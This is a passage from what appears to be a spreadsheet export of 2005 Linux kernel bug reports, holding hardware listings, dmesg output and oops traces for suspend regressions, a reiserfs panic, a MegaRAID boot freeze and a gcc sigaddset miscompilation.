device 006b Flags: bus master, medium devsel, latency 128, IRQ 18 I/O ports at a000 [size=256] Memory at d0208800 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2 02:04.0 CardBus bridge: Texas Instruments PCI1620 PC Card Controller (rev 01) Subsystem: Hewlett-Packard Company: Unknown device 006b Flags: bus master, medium devsel, latency 168, IRQ 16 Memory at d0209000 (32-bit, non-prefetchable) [size=4K] Bus: primary=02, secondary=03, subordinate=06, sec-latency=176 Memory window 0: 60000000-61fff000 (prefetchable) Memory window 1: 66000000-67fff000 I/O window 0: 0000a800-0000a8ff I/O window 1: 0000ac00-0000acff 16-bit legacy interface ports at 0001 02:04.1 CardBus bridge: Texas Instruments PCI1620 PC Card Controller (rev 01) Subsystem: Hewlett-Packard Company: Unknown device 006b Flags: bus master, medium devsel, latency 168, IRQ 17 Memory at d020a000 (32-bit, non-prefetchable) [size=4K] Bus: primary=02, secondary=07, subordinate=0a, sec-latency=176 Memory window 0: 62000000-63fff000 (prefetchable) Memory window 1: 68000000-69fff000 I/O window 0: 00001400-000014ff I/O window 1: 00001800-000018ff 16-bit legacy interface ports at 0001 02:04.2 System peripheral: Texas Instruments PCI1620 Firmware Loading Function (rev 01) Subsystem: Hewlett-Packard Company: Unknown device 006b Flags: bus master, medium devsel, latency 64 I/O ports at a400 [size=64] Capabilities: [44] Power Management version 2 02:07.0 USB Controller: NEC Corporation USB (rev 43) (prog-if 10 [OHCI]) Subsystem: NEC Corporation USB Flags: bus master, medium devsel, latency 64, IRQ 17 Memory at d0206000 (32-bit, non-prefetchable) [size=4K] Capabilities: [40] Power Management version 2 02:07.1 USB Controller: NEC Corporation USB (rev 43) (prog-if 10 [OHCI]) Subsystem: NEC Corporation USB Flags: bus master, medium devsel, latency 64, IRQ 19 Memory at d0207000 (32-bit, non-prefetchable) [size=4K] Capabilities: [40] Power Management version 2 02:07.2 USB Controller: NEC Corporation USB 2.0 (rev 04) (prog-if 20 [EHCI]) Subsystem: NEC Corporation USB 2.0 Flags: bus master, medium devsel, latency 64, IRQ 18 Memory at d0208c00 (32-bit, non-prefetchable) [size=256] Capabilities: [40] Power Management version 2 dmesg Linux version 2.6.14 (root@montroll) (gcc version 4.0.2) #10 SMP Fri Oct 28 15:56:01 EDT 2005 BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009f800 (usable) BIOS-e820: 000000000009f800 - 00000000000a0000 (reserved) BIOS-e820: 00000000000d0000 - 00000000000d8000 (reserved) BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 0000000047f70000 (usable) BIOS-e820: 0000000047f70000 - 0000000047f7d000 (ACPI data) BIOS-e820: 0000000047f7d000 - 0000000047f80000 (ACPI NVS) BIOS-e820: 0000000047f80000 - 0000000048000000 (reserved) BIOS-e820: 0000000057f80000 - 0000000058000000 (reserved) BIOS-e820: 00000000fec00000 - 00000000fec10000 (reserved) BIOS-e820: 00000000fee00000 - 00000000fee01000 (reserved) BIOS-e820: 00000000fff80000 - 0000000100000000 (reserved) Warning only 896MB will be used. Use a HIGHMEM enabled kernel. 896MB LOWMEM available. found SMP MP-table at 000f6570 On node 0 totalpages: 229376 DMA zone: 4096 pages, LIFO batch:1 Normal zone: 225280 pages, LIFO batch:31 HighMem zone: 0 pages, LIFO batch:1 DMI present. ACPI: RSDP (v000 PTLTD ) @ 0x000f6600 ACPI: RSDT (v001 PTLTD RSDT 0x06040000 LTP 0x00000000) @ 0x47f791c8 ACPI: FADT (v001 HP Chinook 0x06040000 ATI 0x000f4240) @ 0x47f7ceed ACPI: MADT (v001 PTLTD APIC 0x06040000 LTP 0x00000000) @ 0x47f7cf61 ACPI: SSDT (v001 PTLTD ACPIHT 0x06040000 LTP 0x00000001) @ 0x47f7cfc9 ACPI: DSDT (v001 HP SB200 0x06040000 INTL 0x20030509) @ 0x00000000 ACPI: PM-Timer IO Port: 0x8008 ACPI: Local APIC address 0xfee00000 ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled) Processor #0 15:2 APIC version 20 ACPI: LAPIC (acpi_id[0x01] lapic_id[0x01] enabled) Processor #1 15:2 APIC version 20 ACPI: LAPIC_NMI (acpi_id[0x00] high edge lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x01] high edge l</t>
  </si>
  <si>
    <t>2.6.15-rc1</t>
  </si>
  <si>
    <t>Konrad Rzepecki</t>
  </si>
  <si>
    <t>suspend to disk and suspend to RAM regression with NEC PCMCIA controller</t>
  </si>
  <si>
    <t>2.6.14.2</t>
  </si>
  <si>
    <t>2005-11-13 04:27 UTC</t>
  </si>
  <si>
    <t>2006-02-17 15:20 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: no newer version tested Distribution: Debian Etch/Sid Hardware Environment: IBM ThinkPad T23, Pentium 3, 384 MB RAM, Mercury USB 2.0 PCMCIA controller (NEC chip). -&gt; lspci 0000:00:00.0 Host bridge: Intel Corporation 82830 830 Chipset Host Bridge (rev 04) 0000:00:01.0 PCI bridge: Intel Corporation 82830 830 Chipset AGP Bridge (rev 04) 0000:00:1d.0 USB Controller: Intel Corporation 82801CA/CAM USB (Hub #1) (rev 02) 0000:00:1d.1 USB Controller: Intel Corporation 82801CA/CAM USB (Hub #2) (rev 02) 0000:00:1d.2 USB Controller: Intel Corporation 82801CA/CAM USB (Hub #3) (rev 02) 0000:00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev 42) 0000:00:1f.0 ISA bridge: Intel Corporation 82801CAM ISA Bridge (LPC) (rev 02) 0000:00:1f.1 IDE interface: Intel Corporation 82801CAM IDE U100 (rev 02) 0000:00:1f.3 SMBus: Intel Corporation 82801CA/CAM SMBus Controller (rev 02) 0000:00:1f.5 Multimedia audio controller: Intel Corporation 82801CA/CAM AC'97 Audio Controller (rev 02) 0000:01:00.0 VGA compatible controller: S3 Inc. SuperSavage IX/C SDR (rev 05) 0000:02:00.0 CardBus bridge: Texas Instruments PCI1420 0000:02:00.1 CardBus bridge: Texas Instruments PCI1420 0000:02:02.0 Communication controller: Agere Systems WinModem 56k (rev 01) 0000:02:08.0 Ethernet controller: Intel Corporation 82801CAM (ICH3) PRO/100 VE (LOM) Ethernet Controller (rev 42) 0000:03:00.0 USB Controller: NEC Corporation USB (rev 43) 0000:03:00.1 USB Controller: NEC Corporation USB (rev 43) 0000:03:00.2 USB Controller: NEC Corporation USB 2.0 (rev 04) (lspci -vv as attachment) Software Environment: -&gt; cat /proc/acpi/info version: 20050902 Problem Description: Neither suspend to disk nor suspend to RAM works when PCMCIA USB controller is plugged in *and* ehci_hcd is loaded. It worked correctly with 2.6.13.4. Both plain vanilla kernels. I attach kernel configurations for both of them to the bug report. Suspend to disk simply doesn't work. Machine is not brought to sleep and is still usable. Suspend to RAM blanks the screen, doesn't switch the machine off completly, but also doesn't unblank the screen anymore. I waited a minute or so and then switched the machine off trusting modern journalling filesystems. This has potential for data loss, so feel free to raise the bug priority when you find it approbiate. Suspend to disk gives in syslog: Nov 13 12:40:34 deepdance kernel: Stopping tasks: ================================================================| Nov 13 12:40:35 deepdance kernel: Freeing memory... done (34965 pages freed) Nov 13 12:40:35 deepdance kernel: ACPI: PCI interrupt for device 0000:03:00.2 disabled Nov 13 12:40:35 deepdance kernel: Could not suspend device 0000:03:00.2: error -22 Nov 13 12:40:35 deepdance kernel: ehci_hcd 0000:03:00.2: port 1 resume error -19 Nov 13 12:40:35 deepdance kernel: hub 6-0:1.0: hub_port_status failed (err = -32) Nov 13 12:40:35 deepdance kernel: ehci_hcd 0000:03:00.2: port 2 resume error -19 Nov 13 12:40:35 deepdance kernel: hub 6-0:1.0: hub_port_status failed (err = -32) Nov 13 12:40:35 deepdance kernel: ehci_hcd 0000:03:00.2: port 3 resume error -19 Nov 13 12:40:35 deepdance kernel: hub 6-0:1.0: hub_port_status failed (err = -32) Nov 13 12:40:35 deepdance kernel: ehci_hcd 0000:03:00.2: port 4 resume error -19 Nov 13 12:40:35 deepdance kernel: hub 6-0:1.0: hub_port_status failed (err = -32) Nov 13 12:40:35 deepdance kernel: ehci_hcd 0000:03:00.2: port 5 resume error -19 Nov 13 12:40:35 deepdance kernel: hub 6-0:1.0: hub_port_status failed (err = -32) Nov 13 12:40:35 deepdance kernel: Some devices failed to suspend Nov 13 12:40:35 deepdance kernel: Restarting tasks...&lt;3&gt;hub 6-0:1.0: over-current change on port 1 Nov 13 12:40:35 deepdance kernel: done Nov 13 12:40:35 deepdance kernel: ehci_hcd 0000:03:00.2: HC died; cleaning up Nov 13 12:40:35 deepdance kernel: hub 6-0:1.0: hub_port_status failed (err = -19) Nov 13 12:40:35 deepdance kernel: hub 6-0:1.0: connect-debounce failed, port 1 disabled Nov 13 12:40:35 deepdance kernel: hub 6-0:1.0: cannot disable port 1 (err = -19) Nov 13 12:40:35 deepdance kernel: hub 6-0:1.0: hub_port_status failed (err = -19) Nov 13 12:40:35 deepdance kernel: hub 6-0:1.0: hub_port_status failed (err = -19) Nov 13 12:40:35 deepdance kernel: hub 6-0:1.0: hub_port_status failed (err = -19) Nov 13 12:40:35 deepdance kernel: hub 6-0:1.0: hub_port_status failed (err = -19) And on the second attempt: Nov 13 12:43:29 deepdance kernel: Stopping tasks: ================================================================| Nov 13 12:43:29 deepdance kernel: Freeing memory... done (10618 pages freed) Nov 13 12:43:29 deepdance kernel: Badness in usb_hcd_pci_suspend at drivers/usb/core/hcd-pci.c:276 Nov 13 12:43:29 deepdance kernel: [&lt;d8878701&gt;] usb_hcd_pci_suspend+0x71/0x190 [usbcore] Nov 13 12:43:29 deepdance kernel: [&lt;c02c19fd&gt;] suspend_device+0xed/0x100 Nov 13 12:43:29 deepdance kernel: [&lt;c02c1ab7&gt;] device_suspend+0xa7/0x1a0 Nov 13 12:43:29 deepdance kernel: [&lt;c0139670&gt;] pm_suspend_disk+0x20/0xb0 Nov 13 12:43:29 deepdance kernel: [&lt;c0137318&gt;] enter_state+0x58/0x80 Nov 13 12:43:29 deepdance kernel: [&lt;c0137498&gt;] state_store+0xa8/0xc3 Nov 13 12:43:29 deepdance kernel: [&lt;c01a17d7&gt;] flush_write_buffer+0x37/0x40 Nov 13 12:43:29 deepdance kernel: [&lt;c01a183b&gt;] sysfs_write_file+0x5b/0x90 Nov 13 12:43:29 deepdance kernel: [&lt;c015d5b5&gt;] vfs_write+0xb5/0x190 Nov 13 12:43:29 deepdance kernel: [&lt;c015d75b&gt;] sys_write+0x4b/0x80 Nov 13 12:43:29 deepdance kernel: [&lt;c0103271&gt;] syscall_call+0x7/0xb Nov 13 12:43:29 deepdance kernel: Could not suspend device 0000:03:00.2: error -22 Nov 13 12:43:29 deepdance kernel: hub 6-0:1.0: hub_port_status failed (err = -19) Nov 13 12:43:29 deepdance kernel: hub 6-0:1.0: hub_port_status failed (err = -19) Nov 13 12:43:29 deepdance kernel: hub 6-0:1.0: hub_port_status failed (err = -19) Nov 13 12:43:29 deepdance kernel: hub 6-0:1.0: hub_port_status failed (err = -19) Nov 13 12:43:29 deepdance kernel: hub 6-0:1.0: hub_port_status failed (err = -19) Nov 13 12:43:29 deepdance kernel: hub 6-0:1.0: activate --&gt; -19 Nov 13 12:43:29 deepdance kernel: Some devices failed to suspend Nov 13 12:43:29 deepdance kernel: Restarting tasks... done Nov 13 12:43:29 deepdance ifplugd(eth0)[4690]: SIGUSR2: Daemon resumed (#1) Nov 13 12:43:30 deepdance kernel: ehci_hcd 0000:03:00.2: HC died; cleaning up Nov 13 12:44:33 deepdance kernel: ohci_hcd 0000:03:00.0: HC died; cleaning up Nov 13 12:44:33 deepdance kernel: ohci_hcd 0000:03:00.1: HC died; cleaning up Nov 13 12:44:33 deepdance kernel: ohci_hcd 0000:03:00.0: remove, state 0 Suspend to RAM does not yield any visible trace in syslog. Suspend to disk as well as suspend to RAM work correctly 1) when I remove the NEC USB controller before 2) do modprobe -r ehci_hcd before 3) I use my previous 2.6.13.4 kernel Steps to reproduce: 1) have similar hardware 2) have Linux with similar kernel (kernel config attached) 3) do suspend to disk or suspend to RAM as follows: suspend to disk: echo platform &gt; /sys/power/disk; echo disk &gt; /sys/power/state suspend to RAM: echo mem &gt; /sys/power/state (I also tried with my suspend and hibernate script which disable ALSA and some more stuff) 4) remove the NEC PCMCIA controller prior to trying suspend to disk and suspend to RAM 5) try with modprobe ehci_hcd -r Here is a complete list of modules loaded by hotplug usually: -&gt; lsmod Module Size Used by ehci_hcd 30696 0 appletalk 31380 2 ipx 25036 2 p8022 1504 1 ipx psnap 2692 2 appletalk,ipx llc 5620 2 p8022,psnap pcmcia 33156 4 binfmt_misc 9288 1 ipv6 253056 8 parport_pc 38148 1 lp 9992 0 parport 33480 2 parport_pc,lp fan 3172 0 button 4752 0 ac 3268 0 battery 7492 0 ibm_acpi 24000 0 firmware_class 7904 1 pcmcia nls_cp850 4544 2 nls_iso8859_15 4288 3 savage 34944 0 drm 67028 1 savage usblp 11168 0 usb_storage 66240 0 ntfs 201424 1 vfat 11360 2 msdos 8768 0 fat 47868 2 vfat,msdos reiserfs 266448 1 udf 88356 0 smbfs 64632 0 sg 31296 0 scsi_mod 88136 2 usb_storage,sg speedstep_ich 3852 0 speedstep_lib 3040 1 speedstep_ich cpufreq_ondemand 5148 0 cpufreq_userspace 3484 1 nvram 7880 1 ohci_hcd 20036 0 usbhid 36480 0 e100 33568 0 mii 4544 1 e100 evdev 7552 0 yenta_socket 24844 5 rsrc_nonstatic 11904 1 yenta_socket pcmcia_core 36816 3 pcmcia,yenta_socket,rsrc_nonstatic snd_intel8x0 30816 5 snd_ac97_codec 95228 1 snd_intel8x0 snd_ac97_bus 1760 1 snd_ac97_codec snd_pcm_oss 50528 0 snd_mixer_oss 17440 1 snd_pcm_oss ide_cd 39236 0 intel_agp 20892 1 snd_pcm 84136 5 snd_intel8x0,snd_ac97_codec,snd_pcm_oss snd_timer 22052 3 snd_pcm snd 48388 12 snd_intel8x0,snd_ac97_codec,snd_pcm_oss,snd_mixer_oss,snd_pcm,snd_timer agpgart 29416 2 drm,intel_agp hw_random 4244 0 uhci_hcd 31216 0 usbcore 114944 7 ehci_hcd,usblp,usb_storage,ohci_hcd,usbhid,uhci_hcd snd_page_alloc 8488 2 snd_intel8x0,snd_pcm cdrom 38304 1 ide_cd BTW even when I remove ehci_hcd prior to suspend to disk I seem to get some messages I didn't have with 2.6.13.4: hub 4-0:1.0: hub_port_status failed hub 5-0:1.0: hub_port_status failed usb 4: resume from parent 2-1, still 0 (or something like that) usb 5: resume from Nov 13 12:45:30 deepdance kernel: usbhid 2-2:1.0: PM: resume from 2, parent 2-2 still 1 also for usb 4 and usb 5 And I have this in syslog, but I do not know anymore which action it belongs to: Nov 13 12:46:06 deepdance kernel: uhci_hcd 0000:00:1d.2: host system error, PCI problems? Nov 13 12:46:06 deepdance kernel: uhci_hcd 0000:00:1d.2: host controller process error, something bad happened! (could be just after some failed suspend to disk attempts) Tell me when you need anything more or I should do further tests. Regards, Martin Steigerwald</t>
  </si>
  <si>
    <t>vanilla 2.6.15-rc1 - reiserfs panic when deleting a lot of big files</t>
  </si>
  <si>
    <t>&lt;= 2.6.15-rc1</t>
  </si>
  <si>
    <t>2005-11-14 01:47 UTC</t>
  </si>
  <si>
    <t>2009-05-16 21:09 UTC</t>
  </si>
  <si>
    <t>Vladimir V. Saveliev</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: none Distribution: gentoo Hardware Environment: P4 / No SMP Software Environment: linux kernel 2.6.15-rc1 and previous kernels Problem Description: I'm having the following oops while trying to mount my reiserfs partition. (the error now occurs at boot, and i'm unable to mount the partition. Previously, the crash occured while trying to delete a directory containing rather big files (&gt; 1 Gig/file) : &lt;0&gt;REISERFS: panic (device sda3): journal-1413: journal_mark_dirty: j_len (1024) is too big [ 79.133742] [ 79.133748] ------------[ cut here ]------------ [ 79.133770] kernel BUG at fs/reiserfs/prints.c:362! [ 79.133789] invalid operand: 0000 [#1] [ 79.133810] CPU: 0 [ 79.133811] EIP: 0060:[&lt;c0195a6f&gt;] Not tainted VLI [ 79.133812] EFLAGS: 00010282 (2.6.14) [ 79.133867] EIP is at reiserfs_panic+0x4f/0x80 [ 79.133886] eax: 0000006c ebx: c02afe93 ecx: 00000000 edx: 000022b5 [ 79.133909] esi: c1bf5000 edi: c1bf5140 ebp: f75a1890 esp: f75a1878 [ 79.133930] ds: 007b es: 007b ss: 0068 [ 79.133949] Process mount (pid: 117, threadinfo=f75a0000 task=f75240b0) [ 79.133960] Stack: c02b4860 c1bf5140 c0355080 c02b6e00 ffffffff f8952000 f75a18d0 c01a466b [ 79.134028] c1bf5000 c02b6e00 00000400 f75a18b4 c012506f f508b9f4 c1bf5000 f75a18bc [ 79.134099] c014a350 f75a18d0 00000000 f8823000 c1bf5000 0d76a58d f75a1904 c017e43e [ 79.134172] Call Trace: [ 79.134211] [&lt;c0102e1f&gt;] show_stack+0x7f/0xa0 [ 79.134248] [&lt;c0102fc3&gt;] show_registers+0x153/0x1c0 [ 79.134276] [&lt;c01031a8&gt;] die+0xc8/0x140 [ 79.134303] [&lt;c029e215&gt;] do_trap+0xb5/0xc0 [ 79.134331] [&lt;c010355c&gt;] do_invalid_op+0xbc/0xd0 [ 79.134361] [&lt;c0102ae3&gt;] error_code+0x4f/0x54 [ 79.134387] [&lt;c01a466b&gt;] journal_mark_dirty+0x26b/0x280 [ 79.134417] [&lt;c017e43e&gt;] _reiserfs_free_block+0x10e/0x1a0 [ 79.134448] [&lt;c017e515&gt;] reiserfs_free_block+0x45/0x60 [ 79.134478] [&lt;c019c819&gt;] prepare_for_delete_or_cut+0x559/0x720 [ 79.134509] [&lt;c019d9ca&gt;] reiserfs_cut_from_item+0xca/0x550 [ 79.134539] [&lt;c019e1db&gt;] reiserfs_do_truncate+0x2db/0x5e0 [ 79.134569] [&lt;c019d48f&gt;] reiserfs_delete_object+0x3f/0x80 [ 79.134598] [&lt;c0185956&gt;] reiserfs_delete_inode+0xa6/0x100 [ 79.134628] [&lt;c0162bbd&gt;] generic_delete_inode+0x5d/0xd0 [ 79.134656] [&lt;c0162d78&gt;] generic_drop_inode+0x18/0x30 [ 79.134685] [&lt;c0162df4&gt;] iput+0x64/0x90 [ 79.134710] [&lt;c019269b&gt;] finish_unfinished+0x27b/0x3d0 [ 79.134741] [&lt;c0194b95&gt;] reiserfs_fill_super+0x565/0x700 [ 79.134768] [&lt;c01505d6&gt;] get_sb_bdev+0x126/0x170 [ 79.134797] [&lt;c0194d9f&gt;] get_super_block+0x2f/0x40 [ 79.134826] [&lt;c0150826&gt;] do_kern_mount+0x56/0xd0 [ 79.134853] [&lt;c0165464&gt;] do_new_mount+0x74/0xb0 [ 79.134880] [&lt;c0165a70&gt;] do_mount+0x140/0x190 [ 79.134906] [&lt;c0165e72&gt;] sys_mount+0x92/0xd0 [ 79.134933] [&lt;c01028b9&gt;] syscall_call+0x7/0xb [ 79.134962] Code: 01 00 00 89 04 24 e8 31 fd ff ff c7 04 24 60 48 2b c0 85 f6 89 d8 0f 45 c7 ba 80 50 35 c0 89 54 24 08 89 44 24 04 e8 41 ce f7 ff &lt;0f&gt; 0b 6a 01 de 03 2b c0 c7 04 24 a0 48 2b c0 85 f6 be 80 50 35 [ 79.136612] Badness in do_exit at kernel/exit.c:799 [ 79.136682] [&lt;c0102e5e&gt;] dump_stack+0x1e/0x30 [ 79.136711] [&lt;c0114ab0&gt;] do_exit+0x320/0x330 [ 79.136737] [&lt;c010321f&gt;] die+0x13f/0x140 [ 79.136764] [&lt;c029e215&gt;] do_trap+0xb5/0xc0 [ 79.136790] [&lt;c010355c&gt;] do_invalid_op+0xbc/0xd0 [ 79.136816] [&lt;c0102ae3&gt;] error_code+0x4f/0x54 [ 79.136845] [&lt;c01a466b&gt;] journal_mark_dirty+0x26b/0x280 [ 79.136873] [&lt;c017e43e&gt;] _reiserfs_free_block+0x10e/0x1a0 [ 79.136903] [&lt;c017e515&gt;] reiserfs_free_block+0x45/0x60 [ 79.136933] [&lt;c019c819&gt;] prepare_for_delete_or_cut+0x559/0x720 [ 79.136962] [&lt;c019d9ca&gt;] reiserfs_cut_from_item+0xca/0x550 [ 79.136990] [&lt;c019e1db&gt;] reiserfs_do_truncate+0x2db/0x5e0 [ 79.137020] [&lt;c019d48f&gt;] reiserfs_delete_object+0x3f/0x80 [ 79.137049] [&lt;c0185956&gt;] reiserfs_delete_inode+0xa6/0x100 [ 79.137077] [&lt;c0162bbd&gt;] generic_delete_inode+0x5d/0xd0 [ 79.137104] [&lt;c0162d78&gt;] generic_drop_inode+0x18/0x30 [ 79.137133] [&lt;c0162df4&gt;] iput+0x64/0x90 [ 79.137161] [&lt;c019269b&gt;] finish_unfinished+0x27b/0x3d0 [ 79.137189] [&lt;c0194b95&gt;] reiserfs_fill_super+0x565/0x700 [ 79.137221] [&lt;c01505d6&gt;] get_sb_bdev+0x126/0x170 [ 79.137247] [&lt;c0194d9f&gt;] get_super_block+0x2f/0x40 [ 79.137276] [&lt;c0150826&gt;] do_kern_mount+0x56/0xd0 [ 79.137305] [&lt;c0165464&gt;] do_new_mount+0x74/0xb0 [ 79.137331] [&lt;c0165a70&gt;] do_mount+0x140/0x190 [ 79.137358] [&lt;c0165e72&gt;] sys_mount+0x92/0xd0 [ 79.137385] [&lt;c01028b9&gt;] syscall_call+0x7/0xb I'm unable to mount it: server ~ # mount /dev/sda3 /data/ Segmentation fault server ~ # cat /etc/fstab|grep reiser /dev/sda3 /data reiserfs noatime 0 0 server ~ # zcat /proc/config.gz |grep -i reiser CONFIG_REISERFS_FS=y # CONFIG_REISERFS_CHECK is not set # CONFIG_REISERFS_PROC_INFO is not set # CONFIG_REISERFS_FS_XATTR is not set Steps to reproduce: Removing a lot of big files at once seems to cause the problem.</t>
  </si>
  <si>
    <t>BIOS &gt;&gt;&gt; ERROR: Invalid checksum</t>
  </si>
  <si>
    <t>2005-11-15 23:35 UTC</t>
  </si>
  <si>
    <t>2007-03-07 23:20 UTC</t>
  </si>
  <si>
    <t>Distribution: gentoo 2005.0 Hardware Environment: mainbord P5LD2-VM, Celeron D 326 Software Environment: Kernel Problem Description: I get this message on boot. Actualy it's working but i don't know is it mineboar issue or kernel. If mainboard: do i need write an email to ASUS and what i need to desribe ? ACPI: RSDP (v000 ACPIAM ) @ 0x00000000000fa520 ACPI: RSDT (v001 A M I OEMRSDT 0x09000528 MSFT 0x00000097) @ 0x000000003f7a0000 ACPI: FADT (v001 A M I OEMFACP 0x09000528 MSFT 0x00000097) @ 0x000000003f7a0200 ACPI: MADT (v001 A M I OEMAPIC 0x09000528 MSFT 0x00000097) @ 0x000000003f7a0390 ACPI: OEMB (v001 A M I AMI_OEM 0x09000528 MSFT 0x00000097) @ 0x000000003f7ae040 &gt;&gt;&gt; ERROR: Invalid checksum ACPI: MCFG (v001 A M I OEMMCFG 0x09000528 MSFT 0x00000097) @ 0x000000003f7a8370 ACPI: ASF! (v032 LEGEND I865PASF 0x00000001 INTL 0x02002026) @ 0x000000003f7a83ac ACPI: DSDT (v001 A0281 A0281034 0x00000034 INTL 0x02002026) @ 0x0000000000000000</t>
  </si>
  <si>
    <t>odd cwd behavior</t>
  </si>
  <si>
    <t>2005-11-16 07:58 UTC</t>
  </si>
  <si>
    <t>2006-03-02 18:48 UTC</t>
  </si>
  <si>
    <t>(From Jim Garlick) I'm playing with v9fs a bit and found some odd behavior with getcwd. (Nice job getting v9fs into the 2.6.14 - the downside is people will find it and use it :-) Here is my setup: * Fedora Core 3 box running 2.6.9-1.667 kernel, runs u9fs (grabbed from v9fs project cvs today) via xinetd. * Fedora Core 4 box running 2.6.14-1.1637_FC4 kernel mounts the first box's filesystem with "mount -t 9P &lt;ip of first box&gt; /w". u9fs starts up on the first box running as nobody. Now if I cd into a subdirectory of the mounted 9P file system - not /w but something under that - and run /bin/pwd, it works. If I do an ls, then /bin/pwd again, it doesn't and an strace shows getcwd returning ENOENT. If I cd to .. and then back again, /bin/pwd works. Another ls, and then /bin/pwd gets ENOENT.</t>
  </si>
  <si>
    <t>Legacy Megaraid freezes during boot</t>
  </si>
  <si>
    <t>2.6.15-rc1-git4</t>
  </si>
  <si>
    <t>2005-11-16 12:13 UTC</t>
  </si>
  <si>
    <t>2005-11-30 13:57 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.14 Distribution: Debian Testing Hardware Environment: Dell PowerEdge 1300 with Perc2/DC with RAID1 array 0000:00:0d.1 I2O: Intel Corporation 80960RP [i960RP Microprocessor] (rev 02) (prog-if 01) Subsystem: Dell PowerEdge Expandable RAID Controller 2/DC Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64, Cache Line Size: 0x08 (32 bytes) Interrupt: pin A routed to IRQ 185 Region 0: Memory at f7000000 (32-bit, prefetchable) [size=4M] Expansion ROM at 50000000 [disabled] [size=32K] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Problem Description: During boot with 2.6.15-rc1-git4, system freezes during init of Megaraid device (CONFIG_MEGARAID_LEGACY=y). Numlock, etc do not respond. System never recovers. Same config/hardware works fine in 2.6.14. Setup is a RAID1 array. Dmesg from 2.6.15-rc1-git4: ACPI: PCI Interrupt 0000:00:0d.1[A] -&gt; GSI 17 (level, low) -&gt; IRQ 185 megaraid: found 0x8086:0x1960:bus 0:slot 13:func 1 scsi0:Found MegaRAID controller at 0xf8802000, IRQ:185 megaraid: [1.06:1p00] detected 1 logical drives. megaraid: channel[0] is raid. megaraid: channel[1] is raid. scsi0 : LSI Logic MegaRAID 1.06 254 commands 16 targs 5 chans 7 luns Dmesg from 2.6.14: ACPI: PCI Interrupt 0000:00:0d.1[A] -&gt; GSI 17 (level, low) -&gt; IRQ 185 megaraid: found 0x8086:0x1960:bus 0:slot 13:func 1 scsi0:Found MegaRAID controller at 0xf8802000, IRQ:185 megaraid: [1.06:1p00] detected 1 logical drives. megaraid: channel[0] is raid. megaraid: channel[1] is raid. scsi0 : LSI Logic MegaRAID 1.06 254 commands 16 targs 5 chans 7 luns scsi0: scanning scsi channel 0 for logical drives. Vendor: MegaRAID Model: LD0 RAID1 8568R Rev: 1.06 Type: Direct-Access ANSI SCSI revision: 02 scsi0: scanning scsi channel 4 [P0] for physical devices. scsi0: scanning scsi channel 5 [P1] for physical devices. st: Version 20050830, fixed bufsize 32768, s/g segs 256 SCSI device sda: 17547264 512-byte hdwr sectors (8984 MB) sda: asking for cache data failed sda: assuming drive cache: write through SCSI device sda: 17547264 512-byte hdwr sectors (8984 MB) sda: asking for cache data failed sda: assuming drive cache: write through sda: sda1 Attached scsi disk sda at scsi0, channel 0, id 0, lun 0</t>
  </si>
  <si>
    <t>sigaddset/sigdelset may not work as expected with gcc optimizer</t>
  </si>
  <si>
    <t>All 2.4 and all 2.6 versions</t>
  </si>
  <si>
    <t>2005-11-17 00:41 UTC</t>
  </si>
  <si>
    <t>Constantine Gavrilov</t>
  </si>
  <si>
    <t>2006-02-22 06:27 UTC</t>
  </si>
  <si>
    <t>I have run into problem using sigaddset() with constant signal argument in kernel code. A code like the following gets miscompiled: sigset_t a; sigset_t b; sigset_t c; ........... sigaddset(&amp;a, const1); sigaddset(&amp;a, const2); ................................ b =a; /* this line causes incorrect code; any 64-bit assignment seems to cause a problem! */ sigaddset(&amp;c, const2); sigaddset(&amp;c, const3); /* more sigaddset to c */ At some iteration of sigaddset to c, c may get the value of a! Disabling optimization, or using -O flag, or using a variable instead of constants fix the problem. All versions of compilers and all kernel versions are affected. The problem is also reproducible in user space (with kernel sigaddset definition). Looking at the dissassembly (or running in the debugger) clearly shows that gcc miscompiled the code. Attached please find a C code (can be compiled into module or executable) that demonstrates the problem, when compiled with -O2 flag. Attached is also a patch that fixes the problem (the patch was prepared against 2.6 tree). I defined sigaddset a macro (similar to sigismember) that calls one function for constant argument and another for variable. In addition to fixing the problem, it also makes sigaddset() faster for constant arguments. To be on the safe side, I changed sigdelset() in the same way (I think the same gcc bug may apply).</t>
  </si>
  <si>
    <t>2.4.32</t>
  </si>
  <si>
    <t>Regression :Resuming from suspend-to-disk no longer works (system freezes)</t>
  </si>
  <si>
    <t>2005-11-18 09:30 UTC</t>
  </si>
  <si>
    <t>Jacek Kawa</t>
  </si>
  <si>
    <t>2006-08-09 21:45 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.14-rc4 Distribution: Debian Unstable Hardware Environment: Compaq Armada 110 without any USB or PCMCIA devices attached; 1. lspci: 0000:00:00.0 Host bridge: VIA Technologies, Inc. VT8601 [Apollo ProMedia] (rev 05) 0000:00:01.0 PCI bridge: VIA Technologies, Inc. VT8601 [Apollo ProMedia AGP] 0000:00:07.0 ISA bridge: VIA Technologies, Inc. VT82C686 [Apollo Super South] (rev 22) 0000:00:07.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 10) 0000:00:07.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 10) 0000:00:07.4 Bridge: VIA Technologies, Inc. VT82C686 [Apollo Super ACPI] (rev 30) 0000:00:07.5 Multimedia audio controller: VIA Technologies, Inc. VT82C686 AC97 Audio Controller (rev 20) 0000:00:09.0 Ethernet controller: Intel Corporation 82557/8/9 